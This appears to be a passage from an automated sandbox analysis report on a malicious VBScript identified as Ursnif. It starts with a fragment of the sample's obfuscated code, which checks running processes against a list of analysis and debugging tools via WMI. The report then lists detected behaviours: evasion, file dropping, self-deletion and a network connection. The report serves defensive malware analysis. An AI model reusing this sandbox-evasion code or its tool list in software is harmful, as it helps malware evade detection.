exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")Set nobleman = GetObject("winmgmts:\\.\root\cimv2")Set CunardlItems = nobleman.ExecQuery("Select * from Win32_Process")REM plastron showmen Fitchburg tailgate cheesy inductor cloak registry requisition, laboratory telepathic. For Each gfqQPu In CunardlItemsvoZIehjd = voZIehjd + 1For Each Vhkskuq In ziLKMIf gfqQPu.Name = Vhkskuq ThenYAOiIY' mandatory patristic spherule Kant wrathful insensible790 concede Aegean inoperable never cultivate avionic woodwind flow

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 6.87960232272

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\metamorphose.xz

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\metamorphose.xz

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.363949393.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363973490.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363868839.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363828372.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363793601.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375177538.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363915717.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363991064.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363760617.00000000056D8000.00000004.00000040.sdmp, type: MEMORY

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\attach_12.12.2020-4570.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.259099556.000001E97B986000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.259099556.000001E97B986000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.259099556.000001E97B986000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.259099556.000001E97B986000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.259099556.000001E97B986000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

WScript reads language and country specific registry keys (likely country aware script)

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation			Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\wscript.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\metamorphose.xz

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 5788

Thread sleep time: -30000s >= -30000s

Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Checks the free space of harddrives

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: wscript.exe, 00000000.00000002.284331236.000001E900630000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.258012201.000001E97F5C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.284331236.000001E900630000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.284331236.000001E900630000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.256825277.000001E97F456000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWa
Source: wscript.exe, 00000000.00000002.284331236.000001E900630000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: metamorphose.xz.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 88.99.66.31 187

Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\krypton.zip VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.258949647.000001E97B987000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.363949393.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363973490.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363868839.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363828372.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363793601.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375177538.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363915717.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363991064.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363760617.00000000056D8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.363949393.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363973490.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363868839.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363828372.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363793601.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375177538.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363915717.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363991064.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363760617.00000000056D8000.00000004.00000040.sdmp, type: MEMORY